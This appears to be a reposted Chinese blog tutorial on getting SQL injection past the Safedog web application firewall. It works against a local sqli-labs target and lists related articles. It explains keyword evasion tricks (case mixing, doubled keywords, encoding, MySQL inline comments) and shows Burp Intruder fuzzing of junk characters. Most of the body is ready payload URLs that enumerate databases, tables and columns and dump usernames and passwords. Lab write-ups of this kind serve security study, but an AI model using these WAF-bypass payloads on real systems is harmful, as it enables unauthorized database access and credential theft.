SQL注入绕过安全狗

这篇具有很好参考价值的文章主要介绍了SQL注入绕过安全狗。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

常规的几种绕过方式:

1. 大小写绕过:

如果程序中设置了过滤关键字,但是程序只是对 and ,AND 或者 or,OR 设置了关键字过滤,那么你就可以使用大小写过滤

例如 :and,or

当然不局限于 and,其它的例如 union 一些关键字如果只是设置了关键字过滤,没有进行深度过滤的话,都是可以使用大小写过滤的

2. 双写绕过:在程序中对某一个关键字例如

union 设置了过滤清空,那么此时你就可以用

UniunionOn 这么一来,就可以实现绕过

当然你是可以结合大小写绕过进行编写的

select id=1 Uniutionon from 

3. 编码绕过:通过 url 编码将语句或关键字进行编码

4. 内联注释绕过:

在 mysql 中,内联注释里的 Sql 语句是会被执行的,语法如下:等价于 select * from users

/*!SELECT*/ * FROM users 

如果在 /*!SELECT*/ 中里面不加 ! ,则 /*SELECT*/ 会以注释的形式存在,这时 select 将不会被当成语句执行,会出现语法错误

/*Select*/ From Users 

报错如下所示:

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

使用该内连接进行绕过的时候,也是可以结合之前的大小写以及双写进行绕过的,结合实际情况进行选择

安全狗的详细绕过:

这里我们以安全狗作为案例,如果你按照常规方法输入 and,那么它会对这个进行一个过滤,从而出现如下界面

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

1. 安全狗 and 的绕过(防止 and 和 or 的注入):

将 and 修改为 /*!12345and*/

注意12345是任意的五位数字,五位!(通常4-6位数字)

然后通过 burp 进行拦截,然后发送到 intruder 模块

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

然后我们需要先点击 clear,然后选中 12345 点击 add

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

然后即可进行爆破

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

然后就是找特征值,例如 14414 即为我们的 payload

http://security/Less-1/?id=2' /*14414and*/ 1=1 -- 1 

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

and 绕过使用 /*!12345*/

另外 12345 这几个数字是随机的,位数推荐 4-6 位

2. 安全狗 order by 的绕过(防止 ordery by 函数的利用):

当你的 get 请求 order by 如果是一起出现的时候,则会出现安全狗警告,这个时候你可以在 order 和 by 之间添加一些字符,(还是 4-6 位)触发页面如下:

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

order /*特殊符号*/ by

注意这里我们不用加上 !,因为我们是添加干扰字符

这里和上面 and 或者 or 绕过的方式不同的是,这里我们采用的是 在 order 和 by 之间添加干扰字符,而不是数字,从而实现绕 过

推荐使用的特殊字符:/$%^&*

同样的原理,对其进行爆破之后,得到 payload 为 //%$

 http://security/Less-1/?id=2' order /*//%$*/ by 1 -- 1

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

3. 安全狗 select union 的绕过(防止联合查询 union):

select 和 union 放在一起的时候会触发

跟上面那个 order by 放在一起会触发一样的绕过道理,不过 select union 需要我们再次通过 burp 进行 fuzz

既然一样的绕过方式,那么 select /*/$%^*/ union 也是一样的方式,抓包,然后去 fuzz

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

http://security/Less-1/?id=-2' union /*/$%^*/ select 1,2,3 -- 1 

上面我们介绍的是 and ,or,以及 select union 联合查询的绕过, 但是这是远远不够的,我们重点应该是放在如何绕过,从而查询数据

4. 查询数据的绕过:

database()的绕过:

database 和 ()放在一起的时候会触发 waf

因此在 database 和 ()之间添加干扰符即可

这里的干扰符是

查询库的绕过语句:

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

 http://security/Less-1/?id=-2' union /*/$%^*/ select 1,database/**/(),3 -- 1 

查询到对应的数据库为 security,接下来就是查询表

查询表的绕过:

第一个绕过点 information_schema.tables

waf 会对后面那个 tables 进行拦截,要想绕过,需改成

information_schema./*tables*/

第二个绕过点from 和 information_schema./*tables*/

当这两个放在一起的时候就会触发 waf,尽管 information_schema./*table*/ 进行了绕过,但是还是会触发 waf

这里我们就要对 from 和 information.schema./*!tables*/ 之间进行处理了

 http://security/Less-1/?id=-2' union /*/$%^*/ select 1,
group_concat(table_name),3 from --+ /*%/ %0a information_schema./*!tables*/ -- 1 

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

绕过过程:首先在 union 和 select 之间放干扰符号,然后在 from 和 information_schema 之间放 --+以及正确的干扰符,然后通过 %0a 进行换行,最后把 information_schema.tables 中 tables 通过内联的方式进行绕过修改为 information_schema./*!tables*/

这里我们可以看到,数据全部都被取出来了,但是还有一个局限的点,这里我们没有通过 where 去指定对应的数据库,where table_name = security,因此它会查询出所有库里面的数据,因此我们还需要指出对应的库名才行

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

但是这里它又会出现 waf 拦截,因为 information_schema 和 where 出现在了一起,因此又需要在中间添加干扰符,在 information_schema./*!tables*/ /*干扰符*/ where 去进行 fuzz 测试

 http://security/Less-1/?id=-2' union /*/$%^*/ select 1,group_concat(table_name),3 
from --+/*%/ %0a information_schema./*!tables*/ /**/ 
where table_schema='security' -- 1

从而获取到 security 库所有的表名:

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

接下来就是获取 security 对应表下的所有列名

无非多添加了一个 and,and 采用内联的方式进行绕过

http://security/Less-1/?id=-2' union 
/*/$%^*/ select 1,group_concat(column_name),3 
from -- +/*%/ %0a information_schema./*!columns*/
/**/ where table_schema='security' /*!12441and*/ table_name='users' -- 1

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全

查询数据的绕过:

http://security/Less-1/?id=-2' union 
/*/$%^*/ select 1,group_concat(username,0x3a,password),3 from /**/  users  -- + 

sql注入绕过安全狗,OWASPTOP漏洞,mysql,数据库,安全文章来源地址https://www.toymoban.com/news/detail-610988.html

完美绕过安全狗

到了这里,关于SQL注入绕过安全狗的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web安全之SQL注入绕过技巧

    两个空格代替一个空格,用Tab代替空格,%a0=空格:   最基本的绕过方法,用注释替换空格: 使用浮点数: 如果空格被过滤,括号没有被过滤,可以用括号绕过。 在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两

    2024年02月07日
    浏览(30)
  • 从SQL注入绕过最新安全狗WAF中学习fuzz

    SQL注入并不是很精通,通过实战绕过WAF来进行加强SQL注入能力,希望对正在学习的师傅能有一丝帮助。 我是本地搭建的环境进行测试的 环境是 windows11+phpstudy2018+sqli-labs phpstudy的安装我不再复述,这里简单说一下安全狗插件和安全狗的安装。 在安装安全狗之前,一定要先做好

    2024年02月14日
    浏览(29)
  • 【实训04】数据库SQL注入漏洞

      下载dvwa的时候其实已经通过了,但建议全部做一下,后面的要用 git clone GitHub - digininja/DVWA: Damn Vulnerable Web Application (DVWA) 注入的sql: 使用sql注入查询数据库用户名和数据库名,并将用户名和数据库名写入/data/workspace/myshixun/result2中: 注入的sql语句: 使用sql注入查询dvwa数据库

    2024年02月16日
    浏览(30)
  • 【网络安全】初探SQL注入漏洞

    要想玩SQL注入,一个简单的数据交互页面是需要的,故我们用PHP做一个简易网页,有登录、注册和首页三块内容。 登录需要输入账号密码,等待提交后进入系统; 注册需要输入名字,密码,手机号,照片,等待提交后进入系统; 首页需要利用PHP和数据库联动后的查询语句,

    2024年02月16日
    浏览(32)
  • Web安全:SQL注入漏洞测试.

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月05日
    浏览(41)
  • web安全漏洞-SQL注入攻击实验

    实验目的 学习sql显注的漏洞判断原理 掌握sqlmap工具的使用 分析SQL注入漏洞的成因 实验工具 sqlmap是用python写的开源的测试框架,支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP,MAXDB并支持6种SQL注入手段。 实验内容 SQL注入(SQL I

    2024年02月06日
    浏览(40)
  • 【网络安全】SQL注入漏洞的修复建议

    SQL注入是Web应用程序常见的安全漏洞之一,攻击者通过恶意构造的SQL查询语句,成功在应用程序的数据库中执行任意操作,导致数据泄露、篡改或其他安全问题。 本篇技术博客将详细介绍SQL注入漏洞的修复建议,包括过滤危险字符和使用预编译语句,通过具体的代码案例帮助

    2024年02月06日
    浏览(40)
  • 【网络安全】「漏洞原理」(二)SQL 注入漏洞之理论讲解

    严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。 【点击此处即可获取282G网络安全零基础入门学习资源】 信息搜集在

    2024年02月06日
    浏览(39)
  • 【网络安全】「漏洞原理」(一)SQL 注入漏洞之概念介绍

    严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。 SQL 注入(SQL Injection) 是一种常见的网络攻击技术,它利用应用程序

    2024年02月06日
    浏览(36)
  • Web安全:SQL注入漏洞测试(防止 黑客利用此漏洞.)

    SQL注入就是 有些 恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容 中,同时程序的本身对用户输入的内容过于相信, 没有对用户插入的SQL语句进行任何的过滤 ,从而 直接被SQL语句直接被服务端执行 ,导致数据库的原有信息泄露,篡改,甚至被删除等风险。 SQL注

    2024年02月13日
    浏览(28)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包